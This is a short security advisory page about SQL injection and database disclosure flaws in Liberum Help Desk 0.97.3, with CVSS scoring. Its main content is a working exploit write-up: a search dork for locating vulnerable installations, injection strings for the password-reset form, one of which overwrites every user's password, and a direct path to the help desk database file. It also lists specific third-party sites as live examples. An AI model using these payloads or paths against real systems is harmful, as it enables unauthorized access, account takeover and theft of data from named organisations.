Liberum Help Desk 0.97.3 (SQL/DD) Remote Vulnerabilities

2009.02.06
Credit: Cold z3ro
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Liberum Help Desk (SQL/DD) Multiple Remote Vulnerabilities author : Cold z3ro, www.hackteach.org Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem" ============== [#] SQL Injection http://www.site.com/[path]/forgotpass.asp In uid insert SQL command's => SCMD ==> ' or '1=1 SCMD ==> ' or 'update tblusers set password = "z3ro" all passwords will be z3ro ============= [#] Database Disclosure http://www.site.com/[path]/db/helpdesk2000.mdb example : https://www.bauer.uh.edu/helpdesk/db/helpdesk2000.mdb http://www.ags2.com/helpdesk/db/helpdesk2000.mdb


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top